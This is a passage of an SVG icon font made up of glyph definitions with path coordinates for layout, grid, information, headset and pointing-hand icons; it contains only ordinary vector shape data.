<glyph unicode="&#xe6e9;" d="M0 480v-512h512v512h-512zM481.882-1.882h-451.764v451.764h451.764v-451.764zM90.353 239.059h30.117v-30.117h-30.118v30.118zM90.353 359.529h30.117v-30.117h-30.118v30.117zM90.353 178.824h30.117v-30.118h-30.118v30.118zM90.353 299.294h30.117v-30.117h-30.118v30.117zM90.353 419.764h30.117v-30.118h-30.118v30.118zM90.353 58.353h30.117v-30.118h-30.118v30.118zM90.353 118.588h30.117v-30.118h-30.118v30.118zM391.529 419.764h30.118v-30.118h-30.118v30.118zM391.529 299.294h30.118v-30.117h-30.118v30.117zM391.529 359.529h30.118v-30.117h-30.118v30.117zM391.529 239.059h30.118v-30.117h-30.118v30.118zM391.529 178.824h30.118v-30.118h-30.118v30.118zM391.529 118.588h30.118v-30.118h-30.118v30.118zM391.529 58.353h30.118v-30.118h-30.118v30.118z" />
<glyph unicode="&#xe6ea;" d="M60.236-1.882h30.118v-30.118h-30.117v30.118zM301.176-32h30.118v30.118h-30.118v-30.118zM361.412-32h30.118v30.118h-30.118v-30.118zM120.471-32h30.117v30.118h-30.118v-30.118zM180.706-32h30.118v30.118h-30.118v-30.118zM240.941-32h30.117v30.118h-30.118v-30.118zM421.647-32h30.118v30.118h-30.118v-30.118zM421.647 389.647h30.118v30.118h-30.118v-30.118zM421.647 329.412h30.118v30.117h-30.118v-30.117zM421.647 88.471h30.118v30.118h-30.118v-30.118zM421.647 269.177h30.118v30.117h-30.118v-30.117zM421.647 208.941h30.118v30.118h-30.118v-30.118zM421.647 28.236h30.118v30.118h-30.118v-30.118zM421.647 148.706h30.118v30.118h-30.118v-30.118zM421.647 480v-30.118h30.118v30.118h-30.118zM361.412 449.882h30.118v30.118h-30.118v-30.118zM180.706 449.882h30.118v30.118h-30.118v-30.118zM240.941 449.882h30.117v30.118h-30.118v-30.118zM301.176 449.882h30.118v30.118h-30.118v-30.118zM120.471 449.882h30.117v30.118h-30.118v-30.118zM60.236 449.882h30.118v30.118h-30.117v-30.118zM60.236 88.471h30.118v30.118h-30.117v-30.118zM60.236 28.236h30.118v30.118h-30.117v-30.118zM60.236 148.706h30.118v30.118h-30.117v-30.118zM60.236 389.647h30.118v30.118h-30.117v-30.118zM60.236 329.412h30.118v30.117h-30.117v-30.117zM60.236 269.177h30.118v30.117h-30.117v-30.117zM60.236 208.941h30.118v30.118h-30.117v-30.118z" />
<glyph unicode="&#xe6eb;" d="M210.823 389.647v30.118h-210.823v-421.647h512v391.529h-301.176zM331.294 359.529v-30.117h-120.471v30.117h120.471zM481.882 28.236h-451.764v361.412h150.588v-90.353h301.176v-271.059zM361.412 329.412v30.117h120.471v-30.117h-120.471z" />
<glyph unicode="&#xe6ec;" d="M361.412 419.764h-361.412v-421.647h512v421.647h-150.588zM481.882 389.647v-60.236h-120.471v60.236h120.471zM331.294 389.647v-60.236h-150.588v60.236h150.588zM30.117 389.647h120.47v-60.236h-120.471v60.236zM481.882 28.236h-451.764v271.059h451.764v-271.059z" />
<glyph unicode="&#xe6ed;" d="M180.706 449.882v-30.118h-180.706v-120.471h30.117v-120.47h150.588v-181.248h331.294v452.307h-331.294zM60.236 299.294h120.471v-30.117h-120.471v30.117zM60.236 208.941v30.118h120.471v-30.118h-120.471zM481.882 27.693h-271.059v301.719h-180.706v60.236h180.706v30.118h271.059v-392.072z" />
<glyph unicode="&#xe6ee;" d="M210.823 419.764v30.118h-210.823v-120.38h30.117v90.262h150.588v-90.353h331.294v90.353h-301.176zM210.823 389.647h120.47v-30.118h-120.471v30.118zM361.412 359.529v30.118h120.471v-30.118h-120.471z" />
<glyph unicode="&#xe6ef;" d="M0 449.882v-421.647h512v421.647h-512zM481.882 58.353h-451.764v361.412h451.764v-361.412zM139.927 168.162l-70.867 70.897 70.897 70.897 21.293-21.293-49.604-49.604 49.574-49.574-21.293-21.324zM350.75 189.485l49.604 49.573-49.574 49.573 21.293 21.293 70.867-70.867-70.897-70.897-21.293 21.324z" />
<glyph unicode="&#xe6f0;" d="M60.236 58.353h391.529v331.294h-391.529v-331.294zM90.353 359.529h331.294v-271.059h-331.294v271.059zM481.882 343.537h30.118v-239.074h-30.118v239.074zM0 343.537h30.117v-239.074h-30.117v239.074z" />
<glyph unicode="&#xe6f1;" d="M512 480v-512h-150.588v512h150.588zM271.059-32h30.118v30.118h-30.118v-30.118zM217.54-32h26.774v30.118h-26.774v-30.118zM56.892-32h26.774v30.118h-26.775v-30.118zM110.442-32h26.775v30.118h-26.775v-30.118zM163.99-32h26.774v30.118h-26.774v-30.118zM0-32h30.117v30.118h-30.117v-30.118zM0 208.941h30.117v30.118h-30.117v-30.118zM0 389.647h30.117v30.118h-30.117v-30.118zM0 148.706h30.117v30.118h-30.117v-30.118zM0 269.177h30.117v30.117h-30.117v-30.117zM0 88.471h30.117v30.118h-30.117v-30.118zM0 28.236h30.117v30.118h-30.117v-30.118zM0 329.412h30.117v30.117h-30.117v-30.117zM0 449.882h30.117v30.118h-30.117v-30.118zM244.284 480h-26.774v-30.118h26.774v30.118zM190.735 480h-26.774v-30.118h26.774v30.118zM83.636 480h-26.745v-30.118h26.775v30.118zM137.186 480h-26.745v-30.118h26.775v30.118zM271.059 449.882h30.118v30.118h-30.118v-30.118zM271.059 28.236h30.118v30.118h-30.118v-30.118zM271.059 88.471h30.118v30.118h-30.118v-30.118zM271.059 208.941h30.118v30.118h-30.118v-30.118zM271.059 148.706h30.118v30.118h-30.118v-30.118zM271.059 329.412h30.118v30.117h-30.118v-30.117zM271.059 269.177h30.118v30.117h-30.118v-30.117zM271.059 389.647h30.118v30.118h-30.118v-30.118z" />
<glyph unicode="&#xe6f2;" d="M0-1.882h30.117v-30.118h-30.117v30.118zM421.647-32h30.118v30.118h-30.118v-30.118zM361.412-32h30.118v30.118h-30.118v-30.118zM301.176-32h30.118v30.118h-30.118v-30.118zM240.941-32h30.117v30.118h-30.118v-30.118zM180.706-32h30.118v30.118h-30.118v-30.118zM60.236-32h30.118v30.118h-30.117v-30.118zM120.471-32h30.117v30.118h-30.118v-30.118zM481.882-32h30.118v30.118h-30.118v-30.118zM481.882 148.706h30.118v30.118h-30.118v-30.118zM481.882 88.471h30.118v30.118h-30.118v-30.118zM481.882 329.412h30.118v30.117h-30.118v-30.117zM481.882 208.941h30.118v30.118h-30.118v-30.118zM481.882 269.177h30.118v30.117h-30.118v-30.117zM481.882 389.647h30.118v30.118h-30.118v-30.118zM481.882 28.236h30.118v30.118h-30.118v-30.118zM481.882 480v-30.118h30.118v30.118h-30.118zM120.471 449.882h30.117v30.118h-30.118v-30.118zM60.236 449.882h30.118v30.118h-30.117v-30.118zM361.412 449.882h30.118v30.118h-30.118v-30.118zM301.176 449.882h30.118v30.118h-30.118v-30.118zM180.706 449.882h30.118v30.118h-30.118v-30.118zM421.647 449.882h30.118v30.118h-30.118v-30.118zM240.941 449.882h30.117v30.118h-30.118v-30.118zM0 449.882h30.117v30.118h-30.117v-30.118zM0 88.471h30.117v30.118h-30.117v-30.118zM0 28.236h30.117v30.118h-30.117v-30.118zM0 148.706h30.117v30.118h-30.117v-30.118zM0 329.412h30.117v30.117h-30.117v-30.117zM0 208.941h30.117v30.118h-30.117v-30.118zM0 389.647h30.117v30.118h-30.117v-30.118zM0 269.177h30.117v30.117h-30.117v-30.117z" />
<glyph unicode="&#xe6f3;" d="M0 480h150.588v-512h-150.588v512zM210.823-32h30.118v30.118h-30.118v-30.118zM428.333-32h26.774v30.118h-26.774v-30.118zM374.784-32h26.774v30.118h-26.774v-30.118zM267.716-32h26.774v30.118h-26.774v-30.118zM321.265-32h26.774v30.118h-26.774v-30.118zM481.882-32h30.118v30.118h-30.118v-30.118zM481.882 389.647h30.118v30.118h-30.118v-30.118zM481.882 28.236h30.118v30.118h-30.118v-30.118zM481.882 269.177h30.118v30.117h-30.118v-30.117zM481.882 329.412h30.118v30.117h-30.118v-30.117zM481.882 208.941h30.118v30.118h-30.118v-30.118zM481.882 148.706h30.118v30.118h-30.118v-30.118zM481.882 88.471h30.118v30.118h-30.118v-30.118zM481.882 480v-30.118h30.118v30.118h-30.118zM428.363 449.882h26.774v30.118h-26.774v-30.118zM374.814 449.882h26.774v30.118h-26.774v-30.118zM321.265 449.882h26.774v30.118h-26.774v-30.118zM267.716 449.882h26.774v30.118h-26.774v-30.118zM210.823 449.882h30.118v30.118h-30.118v-30.118zM210.823 28.236h30.118v30.118h-30.118v-30.118zM210.823 88.471h30.118v30.118h-30.118v-30.118zM210.823 269.177h30.118v30.117h-30.118v-30.117zM210.823 148.706h30.118v30.118h-30.118v-30.118zM210.823 329.412h30.118v30.117h-30.118v-30.117zM210.823 389.647h30.118v30.118h-30.118v-30.118zM210.823 208.941h30.118v30.118h-30.118v-30.118z" />
<glyph unicode="&#xe6f4;" d="M0.632 449.521v-451.764h512v451.764h-512zM245.067 223.729l-214.317-186.639v373.82l214.317-187.181zM43.941 419.404h425.803l-213.203-185.675-212.601 185.675zM256.512 213.73l212.811-185.856h-426.225l213.413 185.856zM267.987 223.729l214.528 186.85v-374.212l-214.528 187.362z" />
<glyph unicode="&#xe6f5;" d="M0 269.177v-90.353h391.529v90.353h-391.529zM240.941 239.059v-30.117h-90.353v30.118h90.353zM30.117 239.059h90.353v-30.117h-90.353v30.118zM361.412 208.941h-90.353v30.118h90.353v-30.118z" />
<glyph unicode="&#xe6f6;" d="M90.353 449.882v-90.353h331.294v90.353h-331.294zM391.529 389.647h-271.059v30.118h271.059v-30.118zM90.353 239.059h331.294v90.353h-331.294v-90.353zM120.471 299.294h271.059v-30.117h-271.059v30.117zM90.353 118.678h331.294v90.353h-331.294v-90.353zM120.471 178.914h271.059v-30.118h-271.059v30.118zM90.353-1.792h331.294v90.353h-331.294v-90.353zM120.471 58.443h271.059v-30.118h-271.059v30.118z" />
<glyph unicode="&#xe6f7;" d="M0 178.824h150.588v90.353h-150.588v-90.353zM30.117 239.059h90.353v-30.117h-90.353v30.118zM180.706 178.824h150.588v90.353h-150.588v-90.353zM210.823 239.059h90.353v-30.117h-90.353v30.118zM361.412 269.177v-90.353h150.588v90.353h-150.588zM481.882 208.941h-90.353v30.118h90.353v-30.118z" />
<glyph unicode="&#xe6f8;" d="M0 269.177v-90.353h512v90.353h-512zM271.059 239.059h90.353v-30.117h-90.353v30.118zM240.941 208.941h-90.353v30.118h90.353v-30.118zM30.117 239.059h90.353v-30.117h-90.353v30.118zM481.882 208.941h-90.353v30.118h90.353v-30.118z" />
<glyph unicode="&#xe6f9;" d="M60.236 88.471h451.764v-30.118h-451.764v30.118zM210.823-1.671h301.177v30.118h-301.176v-30.118zM512 449.882v-331.294h-512v331.294h512zM481.882 419.764h-451.764v-271.059h451.764v271.059z" />
<glyph unicode="&#xe6fa;" d="M240.941 359.529v-271.059h271.059v271.059h-271.059zM481.882 118.588h-210.824v210.824h210.823v-210.824zM35.358 359.529h175.465v-30.117h-175.465v30.117zM105.502 239.179h105.322v-30.117h-105.322v30.118zM210.553 269.236h-210.553v30.118h210.553v-30.118zM0.271 179.034h210.553v-30.118h-210.553v30.118zM35.358 118.588h175.465v-30.118h-175.465v30.118z" />
<glyph unicode="&#xe6fb;" d="M451.764 118.588h-391.529v30.118h391.529v-30.118zM361.412 88.682h-301.176v-30.118h301.176v30.118zM512 449.882v-451.764h-512v451.764h512zM481.882 419.764h-451.764v-391.529h451.764v391.529z" />
<glyph unicode="&#xe6fc;" d="M0 419.764v-361.412h512v361.412h-512zM30.117 178.522v211.125h451.764v-211.125h-451.764z" />
<glyph unicode="&#xe6fd;" d="M361.412 208.941h-301.176v30.118h301.176v-30.118zM361.412 178.824h-301.176v-30.118h301.176v30.118zM512 449.882v-451.764h-512v451.764h512zM481.882 419.764h-451.764v-391.529h451.764v391.529z" />
<glyph unicode="&#xe6fe;" d="M0 88.471h451.764v-30.118h-451.764v30.118zM0-1.671h301.176v30.118h-301.176v-30.118zM512 449.882v-331.294h-512v331.294h512zM481.882 419.764h-451.764v-271.059h451.764v271.059z" />
<glyph unicode="&#xe6ff;" d="M301.176 359.529h175.465v-30.117h-175.466v30.117zM301.176 239.179h105.322v-30.117h-105.322v30.118zM301.447 299.355h210.553v-30.118h-210.553v30.118zM301.176 179.034h210.553v-30.118h-210.553v30.118zM301.176 118.588h175.465v-30.118h-175.466v30.118zM0 88.471h271.059v271.059h-271.059v-271.059zM30.117 329.412h210.823v-210.824h-210.823v210.824z" />
<glyph unicode="&#xe700;" d="M30.117 88.471h451.764v-30.118h-451.764v30.118zM120.471-1.671h271.059v30.118h-271.059v-30.118zM512 449.882v-331.294h-512v331.294h512zM481.882 419.764h-451.764v-271.059h451.764v271.059z" />
<glyph unicode="&#xe701;" d="M30.117 359.529v-180.706h451.764v180.706h-451.764zM451.764 208.941h-391.529v120.471h391.529v-120.471zM421.647 148.706v-30.118h-331.294v30.118h331.294zM60.236 88.471h391.529v-30.118h-391.529v30.118z" />
<glyph unicode="&#xe702;" d="M451.764 359.529h-271.059v30.118h271.059v-30.118zM180.706 329.412v-30.118h331.294v30.118h-331.294zM0 419.764h150.588v-150.588h-150.588v150.588zM30.117 299.294h90.353v90.353h-90.353v-90.353zM451.764 178.824h-271.059v-30.118h271.059v30.118zM180.706 88.471h331.294v30.118h-331.294v-30.118zM0 208.941h150.588v-150.588h-150.588v150.588zM30.117 88.471h90.353v90.353h-90.353v-90.353z" />
<glyph unicode="&#xe703;" d="M451.764 329.412h-271.059v30.117h271.059v-30.117zM180.706 299.294v-30.117h331.294v30.117h-331.294zM0 239.059h150.588v150.588h-150.588v-150.588zM451.764 148.706h-271.059v-30.118h271.059v30.118zM180.706 58.353h331.294v30.118h-331.294v-30.118zM0 28.236h150.588v150.588h-150.588v-150.588z" />
<glyph unicode="&#xe704;" d="M421.647 329.412h-421.647v60.236h421.647v-60.236zM0 299.294v-30.117h512v30.117h-512zM421.647 178.824h-421.647v-60.236h421.647v60.236zM0 58.353h512v30.118h-512v-30.118z" />
<glyph unicode="&#xe705;" d="M496.851 329.412h-75.204v30.117h75.204v-30.117zM466.793 239.179h-45.147v-30.117h45.147v30.118zM421.767 299.355v-30.118h90.233v30.118h-90.233zM421.647 148.916h90.233v30.118h-90.233v-30.118zM421.647 88.471h75.204v30.118h-75.204v-30.118zM0 359.529h391.529v-271.059h-391.529v271.059zM30.117 118.588h331.294v210.824h-331.294v-210.824z" />
<glyph unicode="&#xe706;" d="M512 239.059v-30.117h-512v30.118h512z" />
<glyph unicode="&#xe707;" d="M30.117 359.529h90.353v90.353h-90.353v-90.353zM60.236 419.764h30.118v-30.118h-30.117v30.118zM150.588 359.529h90.353v90.353h-90.353v-90.353zM180.706 419.764h30.118v-30.118h-30.118v30.118zM271.059 359.529h90.353v90.353h-90.353v-90.353zM301.176 419.764h30.118v-30.118h-30.118v30.118zM391.529 449.882v-90.353h90.353v90.353h-90.353zM451.764 389.647h-30.118v30.118h30.118v-30.118zM30.117 239.059h90.353v90.353h-90.353v-90.353zM60.236 299.294h30.118v-30.117h-30.117v30.117zM150.588 239.059h90.353v90.353h-90.353v-90.353zM180.706 299.294h30.118v-30.117h-30.118v30.117zM271.059 239.059h90.353v90.353h-90.353v-90.353zM301.176 299.294h30.118v-30.117h-30.118v30.117zM391.529 239.059h90.353v90.353h-90.353v-90.353zM421.647 299.294h30.118v-30.117h-30.118v30.117zM30.117 118.588h90.353v90.353h-90.353v-90.353zM60.236 178.824h30.118v-30.118h-30.117v30.118zM150.588 118.588h90.353v90.353h-90.353v-90.353zM180.706 178.824h30.118v-30.118h-30.118v30.118zM271.059 118.588h90.353v90.353h-90.353v-90.353zM301.176 178.824h30.118v-30.118h-30.118v30.118zM391.529 118.588h90.353v90.353h-90.353v-90.353zM421.647 178.824h30.118v-30.118h-30.118v30.118zM30.117-1.882h90.353v90.353h-90.353v-90.353zM60.236 58.353h30.118v-30.118h-30.117v30.118zM150.588-1.882h90.353v90.353h-90.353v-90.353zM180.706 58.353h30.118v-30.118h-30.118v30.118zM271.059-1.882h90.353v90.353h-90.353v-90.353zM301.176 58.353h30.118v-30.118h-30.118v30.118zM391.529-1.882h90.353v90.353h-90.353v-90.353zM421.647 58.353h30.118v-30.118h-30.118v30.118z" />
<glyph unicode="&#xe708;" d="M0 329.412h150.588v150.588h-150.588v-150.588zM30.117 449.882h90.353v-90.353h-90.353v90.353zM180.706 329.412h150.588v150.588h-150.588v-150.588zM210.823 449.882h90.353v-90.353h-90.353v90.353zM361.412 480v-150.588h150.588v150.588h-150.588zM481.882 359.529h-90.353v90.353h90.353v-90.353zM0 148.706h150.588v150.588h-150.588v-150.588zM30.117 269.177h90.353v-90.353h-90.353v90.353zM180.706 148.706h150.588v150.588h-150.588v-150.588zM210.823 269.177h90.353v-90.353h-90.353v90.353zM361.412 148.706h150.588v150.588h-150.588v-150.588zM391.529 269.177h90.353v-90.353h-90.353v90.353zM0-32h150.588v150.588h-150.588v-150.588zM30.117 88.471h90.353v-90.353h-90.353v90.353zM180.706-32h150.588v150.588h-150.588v-150.588zM210.823 88.471h90.353v-90.353h-90.353v90.353zM361.412-32h150.588v150.588h-150.588v-150.588zM391.529 88.471h90.353v-90.353h-90.353v90.353z" />
<glyph unicode="&#xe709;" d="M0 269.177h210.823v210.823h-210.823v-210.823zM30.117 449.882h150.588v-150.588h-150.588v150.588zM271.059 480v-210.823h210.824v210.823h-210.823zM451.764 299.294h-150.588v150.588h150.588v-150.588zM0-1.882h210.823v210.824h-210.823v-210.823zM30.117 178.824h150.588v-150.588h-150.588v150.588zM271.059-1.882h210.824v210.824h-210.823v-210.823zM301.176 178.824h150.588v-150.588h-150.588v150.588z" />
<glyph unicode="&#xe70a;" d="M0 419.764h90.353v-90.353h-90.353v90.353zM271.059 329.412h90.353v90.353h-90.353v-90.353zM0 88.471h90.353v90.353h-90.353v-90.353zM271.059 88.471h90.353v90.353h-90.353v-90.353zM120.471 389.647h120.471v30.118h-120.471v-30.118zM120.471 329.412h120.471v30.117h-120.471v-30.117zM391.529 419.764v-30.118h120.471v30.118h-120.471zM391.529 329.412h120.471v30.117h-120.471v-30.117zM210.823 299.324h-90.353v-30.118h90.353v30.118zM481.882 299.324h-90.353v-30.118h90.353v30.118zM120.471 148.706h120.471v30.118h-120.471v-30.118zM120.471 88.471h120.471v30.118h-120.471v-30.118zM391.529 148.706h120.471v30.118h-120.471v-30.118zM391.529 88.471h120.471v30.118h-120.471v-30.118zM120.471 28.265h90.353v30.118h-90.353v-30.118zM391.529 28.265h90.353v30.118h-90.353v-30.118z" />
<glyph unicode="&#xe70b;" d="M0 389.647v-331.294h512v331.294h-512zM481.882 88.471h-451.764v271.059h451.764v-271.059zM421.647 239.059h-301.176v30.118h301.176v-30.118zM271.059 208.941h150.588v-60.236h-150.588v60.236z" />
<glyph unicode="&#xe70c;" d="M0 389.647v-331.294h512v331.294h-512zM481.882 88.471h-451.764v271.059h451.764v-271.059zM391.529 239.059h-301.176v30.118h301.176v-30.118zM240.941 148.706h-150.588v60.236h150.588v-60.236z" />
<glyph unicode="&#xe70d;" d="M421.647 239.059h-331.294v30.118h331.294v-30.118zM512 389.647v-331.294h-512v331.294h512zM481.882 359.529h-451.764v-271.059h451.764v271.059zM191.458 148.706h129.084v60.236h-129.084v-60.236z" />
<glyph unicode="&#xe70e;" d="M271.059 269.177h-210.823v30.117h210.823v-30.117zM120.26 208.941h150.588v30.118h-150.588v-30.118zM512 389.647v-301.176h-512v301.176h512zM481.882 359.529h-451.764v-240.941h451.764v240.941zM451.764 299.294h-150.588v-60.235h150.588v60.235z" />
<glyph unicode="&#xe70f;" d="M451.764 269.177h-210.823v30.117h210.823v-30.117zM241.152 208.941h150.588v30.118h-150.588v-30.118zM512 389.647v-301.176h-512v301.176h512zM481.882 359.529h-451.764v-240.941h451.764v240.941zM210.823 299.294h-150.588v-60.235h150.588v60.235z" />
<glyph unicode="&#xe710;" d="M30.117-32h90.353v512h-90.353v-512zM60.236 449.882h30.118v-451.764h-30.117v451.764zM150.588-32h90.353v512h-90.353v-512zM180.706 449.882h30.118v-451.764h-30.118v451.764zM271.059-32h90.353v512h-90.353v-512zM301.176 449.882h30.118v-451.764h-30.118v451.764zM391.529 480v-512h90.353v512h-90.353zM451.764-1.882h-30.118v451.764h30.118v-451.764z" />
<glyph unicode="&#xe711;" d="M0-32h150.588v512h-150.588v-512zM30.117 449.882h90.353v-451.764h-90.353v451.764zM180.706-32h150.588v512h-150.588v-512zM210.823 449.882h90.353v-451.764h-90.353v451.764zM361.412 480v-512h150.588v512h-150.588zM481.882-1.882h-90.353v451.764h90.353v-451.764z" />
<glyph unicode="&#xe712;" d="M0-32h240.941v512h-240.941v-512zM30.117 449.882h180.706v-451.764h-180.706v451.764zM271.059 480v-512h240.941v512h-240.941zM481.882-1.882h-180.706v451.764h180.706v-451.764z" />
<glyph unicode="&#xe713;" d="M0 480v-90.353h512v90.353h-512zM481.882 419.764h-451.764v30.118h451.764v-30.118zM0 88.471h512v271.059h-512v-271.059zM30.117 329.412h451.764v-210.824h-451.764v210.824zM0-32h512v90.353h-512v-90.353zM30.117 28.236h451.764v-30.118h-451.764v30.118z" />
<glyph unicode="&#xe714;" d="M0 480v-512h512v512h-512zM481.882 449.882v-271.059h-451.764v271.059h451.764zM481.882 148.706v-60.236h-451.764v60.236h451.764zM30.117-1.882v60.236h451.764v-60.236h-451.764z" />
<glyph unicode="&#xe715;" d="M120.471 480v-271.059h391.529v271.059h-391.529zM481.882 239.059h-331.294v210.823h331.294v-210.823zM0 389.647h90.353v90.353h-90.353v-90.353zM30.117 449.882h30.117v-30.118h-30.117v30.118zM120.471 88.471h391.529v90.353h-391.529v-90.353zM150.588 148.706h331.294v-30.118h-331.294v30.118zM0 88.471h90.353v90.353h-90.353v-90.353zM30.117 148.706h30.117v-30.118h-30.117v30.118zM120.471-32h391.529v90.353h-391.529v-90.353zM150.588 28.236h331.294v-30.118h-331.294v30.118zM0-32h90.353v90.353h-90.353v-90.353zM30.117 28.236h30.117v-30.118h-30.117v30.118z" />
<glyph unicode="&#xe716;" d="M90.353 480v-195.735l164.623-286.087 166.671 286.058v195.764h-331.294zM255.126 58.353h0.060l-0.030-0.060-0.030 0.060zM256 299.294c-16.625 0-30.118 13.523-30.118 30.118s13.493 30.117 30.118 30.117 30.118-13.523 30.118-30.117-13.493-30.118-30.118-30.118zM391.529 292.367l-120.471-206.788v185.736c25.901 6.716 45.176 30.118 45.176 58.097 0 33.22-27.015 60.236-60.236 60.236s-60.236-27.015-60.236-60.236c0-27.979 19.275-51.38 45.177-58.097v-188.356l-120.471 209.378v157.546h271.059v-157.515z" />
<glyph unicode="&#xe717;" d="M256 480c-141.161 0-256-114.839-256-256s114.838-256 256-256 256 114.839 256 256-114.839 256-256 256zM256-1.882c-124.567 0-225.882 101.316-225.882 225.882s101.316 225.882 225.882 225.882 225.882-101.316 225.882-225.882-101.316-225.882-225.882-225.882zM271.059 107.475h29.485v-30.118h-89.088v30.118h29.485v133.12h-28.492v30.118h58.609v-163.238zM216.395 329.833c0 16.414 13.282 29.696 29.696 29.696s29.666-13.282 29.666-29.696c0-16.354-13.252-29.636-29.666-29.636s-29.696 13.282-29.696 29.636z" />
<glyph unicode="&#xe718;" d="M256 480c-141.161 0-256-114.839-256-256s114.838-256 256-256 256 114.839 256 256-114.839 256-256 256zM256-1.882c-124.567 0-225.882 101.316-225.882 225.882s101.316 225.882 225.882 225.882 225.882-101.316 225.882-225.882-101.316-225.882-225.882-225.882zM290.876 111.993c0-17.107-13.914-31.051-31.051-31.051-17.197 0-31.112 13.945-31.112 31.051 0 17.167 13.915 31.082 31.112 31.082 17.137 0 31.051-13.884 31.051-31.082zM321.115 353.054c13.493-17.016 20.3-39.996 16.565-55.868-7.319-30.931-25.359-47.195-41.291-61.531-16.354-14.728-28.13-25.299-28.13-49.604h-30.118c0 37.677 20.209 55.899 38.069 71.981 13.884 12.499 26.986 24.305 32.106 46.050 1.024 4.307-1.175 18.070-10.842 30.268-9.246 11.716-21.925 17.649-37.587 17.649-53.579 0-56.29-43.49-56.411-48.459l-30.118 0.813c0.723 26.895 19.727 77.764 86.528 77.764 24.636 0 46.351-10.33 61.229-29.063z" />
<glyph unicode="&#xe719;" d="M471.884 298.782c-28.822 107.128-116.344 181.218-215.884 181.218-99.238 0-187.091-74.21-215.883-181.218-22.498-2.47-40.117-21.444-40.117-44.665v-120.471c0-18.824 11.505-34.937 27.828-41.713 5.843-52.615 50.086-93.817 104.237-93.817h81.529c6.234-17.498 22.799-30.117 42.406-30.117h90.353c24.907 0 45.176 20.269 45.176 45.176s-20.269 45.176-45.176 45.176h-90.353c-19.607 0-36.172-12.62-42.406-30.118h-81.529c-36.382 0-66.771 25.901-73.758 60.236h32.045v30.118h30.118v150.588h-30.118v30.118h-18.251c27.498 89.178 100.954 150.588 183.899 150.588 83.185 0 156.401-61.35 183.899-150.588h-18.252v-30.118h-30.118v-150.588h30.118v-30.118h45.357c24.817 0 44.996 20.269 44.996 45.176v120.471c0 23.221-17.619 42.195-40.116 44.664zM256 28.236h90.353c8.283 0 15.059-6.747 15.059-15.059s-6.776-15.059-15.059-15.059h-90.353c-8.282 0-15.059 6.747-15.059 15.059s6.776 15.059 15.059 15.059zM60.236 118.588h-15.239c-8.192 0-14.878 6.747-14.878 15.059v120.471c0 8.313 6.686 15.059 14.878 15.059h15.239v-150.588zM481.882 133.647c0-8.313-6.686-15.059-14.878-15.059h-15.24v150.588h15.24c8.192 0 14.878-6.746 14.878-15.059v-120.471z" />
<glyph unicode="&#xe71a;" d="M436.706 231.951v-95.955c0-20.179-9.698-46.833-18.252-70.325-5.572-15.269-11.866-32.587-11.866-39.454v-25.75c0-8.313-6.747-15.059-15.059-15.059s-15.059 6.747-15.059 15.059v25.75c0 12.168 6.053 28.762 13.673 49.755 7.71 21.142 16.444 45.116 16.444 59.995v95.985c0 8.734-7.108 16.113-15.541 16.113-8.795 0-13.673-7.891-13.945-15.661-0.271-8.192-6.295-15.269-15.3-14.517-8.192 0.151-14.788 6.867-14.788 15.059v47.044c0 8.915-6.837 16.173-15.209 16.173-7.951 0-14.577-6.626-15.119-15.059-0.512-8.132-6.867-14.607-15.51-14.095-8.132 0.271-14.577 6.927-14.577 15.059v38.159c0 8.885-6.747 16.113-15.059 16.113-7.8 0-14.668-6.084-15.691-13.884-1.024-7.831-7.891-13.884-15.902-13.071-7.921 0.512-14.095 7.077-14.095 15.029v109.357c0 8.885-6.837 16.113-15.209 16.113s-15.209-7.228-15.209-16.113v-186.127c0-6.204-3.795-11.776-9.577-14.035-5.752-2.259-12.348-0.723-16.565 3.825l-33.551 36.472c-13.824 13.915-18.281 11.264-22.528 8.644-7.409-4.397-9.969-14.577-5.662-22.287l99.027-213.775c1.596-2.74 4.97-5.361 8.945-6.355 6.716-1.716 11.385-7.71 11.385-14.607v-25.058c0-8.313-6.746-15.059-15.059-15.059s-15.059 6.747-15.059 15.059v15.029c-7.018 4.036-12.86 9.939-17.017 17.288l-98.996 213.775c-11.836 20.902-4.427 49.122 17.017 61.862 28.913 17.317 51.291-5.21 59.693-13.673l7.831-8.493v147.516c0 25.51 20.359 46.231 45.327 46.231s45.327-20.721 45.327-46.231v-70.023c4.879 1.747 10.119 2.71 15.571 2.71 23.823 0 43.37-18.944 45.056-42.887 4.759 1.777 9.878 2.71 15.209 2.71 24.998 0 45.327-20.751 45.327-46.291v-4.096c4.367 1.476 9.036 2.259 13.945 2.259 25.148 0.030 45.628-20.721 45.628-46.201z" />
<glyph unicode="&#xe71b;" d="M509.651 254.298c0-24.968-20.721-45.297-46.231-45.297h-70.024c1.777-4.879 2.74-10.149 2.74-15.601 0-23.823-18.944-43.37-42.887-45.056 1.747-4.759 2.68-9.849 2.68-15.18 0-24.998-20.751-45.357-46.26-45.357h-4.096c1.476-4.367 2.259-9.036 2.259-13.945 0-25.148-20.781-45.628-46.26-45.628h-95.924c-20.179 0-46.833 9.698-70.355 18.252-15.27 5.572-32.557 11.866-39.424 11.866h-25.75c-8.313 0-15.059 6.747-15.059 15.059s6.746 15.059 15.059 15.059h25.75c12.137 0 28.732-6.024 49.694-13.673 21.203-7.71 45.207-16.444 60.084-16.444h95.924c8.764 0 16.143 7.108 16.143 15.541 0 8.795-7.891 13.673-15.661 13.945-8.192 0.301-14.667 7.108-14.517 15.33s6.867 14.788 15.059 14.788h47.044c8.915 0 16.143 6.837 16.143 15.24 0 7.951-6.596 14.547-14.998 15.089-8.162 0.512-14.396 7.349-14.156 15.51 0.271 8.132 6.897 14.577 15.059 14.577h38.189c8.885 0 16.113 6.776 16.113 15.059 0 7.8-6.114 14.697-13.914 15.692-7.861 1.024-13.583 8.012-13.071 15.902 0.542 7.951 7.077 14.095 15.029 14.095h109.357c8.885 0 16.113 6.806 16.113 15.179 0 8.403-7.228 15.24-16.113 15.24h-186.127c-6.204 0-11.776 3.795-14.035 9.577s-0.692 12.348 3.855 16.565l36.472 33.521c13.854 13.824 11.204 18.221 8.644 22.528-4.457 7.499-14.457 10.089-22.348 5.662l-213.745-98.997c-2.68-1.566-5.3-4.939-6.355-8.945-1.656-6.716-7.65-11.385-14.577-11.385h-25.058c-8.313 0-15.059 6.746-15.059 15.059s6.746 15.059 15.059 15.059h15.029c4.036 7.018 9.909 12.891 17.258 16.987l213.775 99.027c20.872 11.746 49.152 4.397 61.892-17.016 17.288-28.822-5.211-51.26-13.644-59.693l-8.493-7.83h147.486c25.479 0 46.231-20.36 46.231-45.357z" />
